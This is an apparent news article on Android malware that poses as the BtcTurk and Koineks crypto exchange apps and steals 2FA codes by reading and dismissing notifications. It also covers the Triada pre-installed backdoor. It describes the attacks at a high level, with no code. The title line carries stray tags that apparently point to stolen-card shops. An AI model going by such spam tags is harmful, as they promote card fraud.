Android Phones in Danger Not Even 2FA Can Stop the New Malware jshop-prosu, cvv-shopru
Online threats are becoming more and more
sophisticated and capable, with the current security features of modern devices
no longer being able to stop them. This is especially true when it comes to
Android phones, and the recent research reports prove it.
Several weeks ago, Google admitted that a
number of low-end Android devices were infected with pre-installed malware.
However, while researching this, experts also uncovered that there is a malware
that haunts Google Play Store, and that it can bypass security firewalls if
The discovery was made by security experts
from We Live Security by ESET . They pointed out
that some specific apps, which can be downloaded from the Play Store, can
actually bypass Google’s restrictions. Further, the malicious apps can’t be
stopped by the 2FA (2 Factor Authentication) on their way to accessing OTPs
(One-Time Passwords) in SMS 2FA messages. According to some evidence, it is
also possible that the malware can gain access to OTPs from emails as well.
Google has had problems with malicious apps for a long time now. Every so often, the tech giant would block dozens of newly-discovered apps due to their malicious nature. Then, in March of this year, the company restricted Call Log and SMS permissions in Android apps. It was hoped that this would prevent apps from stealing user credentials and bypassing 2FA .
As many are likely aware, the 2FA system is an
additional security layer where users need to receive and then input a special
code in order to access various accounts. These are known as one-time passwords
which users receive via email, or more often — via SMS.
This was considered to be a great solution, and for a long while, it was. However, things started to change when hackers started posting malicious apps that would request access to SMS. Since most users do not usually pay attention to granting permissions, many have allowed it, and the hackers were able to steal OTPs and use them themselves, thus successfully bypassing 2FA.
Google reacted by preventing the apps from asking
such permissions, and now — it appears that this security feature is
circumvented by a new malware. Security experts believe that the app
impersonates a Turkey-based crypto exchange, BtcTurk, and then steals login
credentials for the actual service.
In other words, instead of trying to intercept SMS messages and steal OTPs like before, the malicious app now scans the screen of the device and takes information from the notification that pops up once the codes are received. Not only that, but it can also dismiss the notifications as soon as it gets what it needs so that the user would not realize what is happening.
While it is likely that more of such
techniques will be used in the future — this is still an important discovery,
as this is the first malware that managed to bypass Google’s new restrictions.
Of course, the malware has already spread, and it now comes as a part of
multiple apps. BTCTurk Pro Beta was the first one to be discovered, and it was
already downloaded around 50 times before being discovered by researchers.
Then, another app with the same name appeared,
only a different developer uploaded it. Google removed the second app as well,
and the hacker then uploaded the third app, with the same function, as well as
with the same malware. With the new apps, researchers believe that the attacks
have been evolving as well.
Then, only a week ago, researchers were
notified of another potentially malicious app that impersonated another Turkish
crypto exchange, known as Koineks. This app also used the same technique, and
further research indicates that it also comes from the same developer. The
conclusion that researchers managed to come to is that the attackers are likely
testing the malware, which is evolving and getting better at obtaining OTPs
without actually accessing and stealing SMS.
As mentioned earlier, the announcement of the new method of stealing OTPs came only a few days after Google stated that there were a few low-end Android devices that came with the pre-installed malware . The company discussed the malware, known as Triada, in detail, and even confirmed that Doogee, Leagoo, and Cherry Mobile have it pre-installed. This particular malware was discovered in 2016 by Kaspersky Labs. Now, it seems that it gets installed on phones during the supply chain process. According to Google, cybercriminals managed to compromise Android phones and install a backdoor in quite a few of them, which is yet another threat to the security of users.